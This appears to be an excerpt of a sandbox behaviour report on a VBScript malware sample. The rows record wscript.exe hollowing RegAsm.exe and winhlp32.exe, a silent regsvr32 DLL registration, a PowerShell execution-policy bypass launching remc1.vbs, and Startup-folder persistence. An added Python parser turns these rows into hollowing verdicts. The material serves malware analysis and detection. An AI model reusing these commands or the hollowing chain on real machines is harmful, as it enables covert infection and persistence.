        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 2C31008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 29D3008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 2BCF008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 310E008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 29B7008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 268F008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 2C59008
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exe | Memory written: C:\Windows\winhlp32.exe base: 2CCC008
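The injection rows above only become a finding when read together: for each injector/target pair, an executable-and-writable allocation at the target's image base, a write at that same base whose first bytes are 4D5A (the "MZ" header), and an injector function whose API chain unmaps the original image, writes, sets the thread context and resumes (the 2_2_05660054 chain from wscript.exe). The "Thread delayed: delay time: 922337203685477" rows belong to the same evasion picture: that figure is (2**63 - 1) // 10000, i.e. .NET's TimeSpan.MaxValue in milliseconds, so the sleep never returns in practice. The Python below is an added example, not Joe Sandbox code and not the sample's code: it parses lines in the report's own "Source: <process><observation>" shape (with or without a separator between the two columns, and with or without the "Jump to behavior" link text) and produces a verdict per injector/target pair plus a label per delay. The sample lines are a constructed subset of the report's rows; the verdict labels and the one-minute "long stall" threshold are this example's own assumptions.

```python
"""Correlate Joe Sandbox behaviour rows into process-hollowing verdicts.

Added example for this report, not Joe Sandbox code. Input rows are in the
report's own "Source: <process><observation>" shape, with or without a
separator between the two columns and with or without trailing
"Jump to behavior" link text.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Memory allocated|Memory written|Code function|Thread delayed):\s*"
    r"(?P<rest>.*?)\s*(?:Jump to behavior)?\s*$"
)
ALLOC_RE = re.compile(r"^(?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^(?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)"
                      r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
CODE_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<apis>.+)$")
DELAY_RE = re.compile(r"delay time:\s*(?P<ms>\d+)")

# .NET TimeSpan.MaxValue in milliseconds: (2**63 - 1) ticks / 10,000 ticks per ms.
# This is exactly the "delay time" the report shows for RegAsm.exe and powershell.exe.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477
LONG_STALL_MS = 60_000  # assumption: a minute or more is a sandbox-timeout stall
SET_CONTEXT = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}

# Constructed sample: a subset of the report's rows, copied in their raw form.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_2_05660054 CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_05660054
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: C:\Windows\winhlp32.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
"""


def parse_lines(text):
    """Yield (kind, source, observation) for each row in the report shape."""
    for line in text.splitlines():
        if m := LINE_RE.match(line):
            yield m["kind"], m["src"], m["rest"]


def classify_delay(ms):
    """Label a 'Thread delayed' value given in milliseconds."""
    if ms >= TIMESPAN_MAX_MS:
        return "effectively infinite"
    return "long stall" if ms >= LONG_STALL_MS else "short"


def find_hollowing(events):
    """Per (injector, target): RWX allocation and MZ write at one base plus the hollowing API chain."""
    rwx = defaultdict(set)      # bases allocated executable+writable in the target
    mz = defaultdict(set)       # bases where the written buffer starts with 'MZ' (4D5A)
    writes = defaultdict(int)   # remote writes into the target
    chains = defaultdict(set)   # APIs called by the injector's own code
    for kind, src, rest in events:
        if kind == "Memory allocated" and (m := ALLOC_RE.match(rest)):
            if "execute" in m["prot"] and "write" in m["prot"]:
                rwx[(src, m["target"])].add(int(m["base"], 16))
        elif kind == "Memory written" and (m := WRITE_RE.match(rest)):
            pair = (src, m["target"])
            writes[pair] += 1
            if (m["magic"] or "").upper().startswith("4D5A"):
                mz[pair].add(int(m["base"], 16))
        elif kind == "Code function" and (m := CODE_RE.match(rest)):
            # the raw export repeats the function id after the API list; drop it
            chains[src] |= {a.strip() for a in m["apis"].split(",")} - {m["fid"], ""}
    results = {}
    for pair in set(rwx) | set(mz) | set(writes):
        apis = chains.get(pair[0], set())
        chain_ok = ({"NtUnmapViewOfSection", "WriteProcessMemory", "ResumeThread"} <= apis
                    and bool(apis & SET_CONTEXT))
        image_bases = rwx[pair] & mz[pair]
        if image_bases and chain_ok:
            verdict = "process hollowing"
        elif mz[pair]:
            verdict = "remote PE write"
        else:
            verdict = "remote allocation only"
        results[pair] = {"image_base": f"0x{min(image_bases):X}" if image_bases else None,
                         "remote_writes": writes[pair], "hollowing_api_chain": chain_ok,
                         "verdict": verdict}
    return results


def analyze(text):
    """Run both correlations over a report fragment."""
    events = list(parse_lines(text))
    delays = [(src, int(DELAY_RE.search(rest)["ms"]))
              for kind, src, rest in events if kind == "Thread delayed" and DELAY_RE.search(rest)]
    return {"injections": find_hollowing(events),
            "delays": [(src, ms, classify_delay(ms)) for src, ms in delays]}


if __name__ == "__main__":
    for (injector, target), info in analyze(SAMPLE_LINES)["injections"].items():
        print(f"{injector} -> {target}: {info['verdict']} at {info['image_base']}")
```

Run against the full report, the same code attributes both RegAsm.exe and winhlp32.exe to wscript.exe as hollowed hosts; the RegAsm.exe self-allocation row ("page read and write | page guard") carries no target and is ignored, and a fragment without the injector's Code function row degrades to "remote PE write" rather than a false "process hollowing".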
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00419627 mouse_event
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3318000698.000000000550E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q&
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00434C52 cpuid 17_2_00434C52
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,17_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,19_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,21_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,23_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,23_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,23_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,23_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,23_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,27_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,27_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,27_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00451F9B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
